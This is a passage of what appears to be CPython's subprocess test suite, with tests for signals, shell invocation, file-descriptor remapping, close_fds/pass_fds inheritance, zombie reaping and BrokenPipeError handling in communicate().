sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
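# A minimal sketch of the save/restore pattern the two helpers above
# implement, assuming fd is an open descriptor:
#   inheritable = os.get_inheritable(fd)
#   saved = os.dup(fd)        # dup() results are non-inheritable (PEP 446)
#   ...                       # clobber or close fd during the test
#   os.dup2(saved, fd, inheritable=inheritable)
#   os.close(saved)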
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set, this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
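# Context (informal): since PEP 446, descriptors created by Python start
# non-inheritable, e.g.:
#   r, w = os.pipe()          # both fds begin non-inheritable
# pass_fds makes the listed fds inheritable in the child between fork()
# and exec() without flipping the flag in the parent, which is what the
# two get_inheritable() assertions above verify.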
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
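# Note: bufsize=0 requests an unbuffered binary pipe, so the five bytes
# the child writes are readable as soon as they arrive; after consuming
# four of them, select() must still report the remaining byte as ready.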
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# give the process some time to exit, then create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
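# Mechanism sketch (informal): on POSIX, Popen.__del__ parks a still
# running child in subprocess._active, and each later Popen() call polls
# that list to reap leftovers; constructing the (failing) Popen above is
# what finally wait()s on the killed child and drops it from _active.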
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a TypeError would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
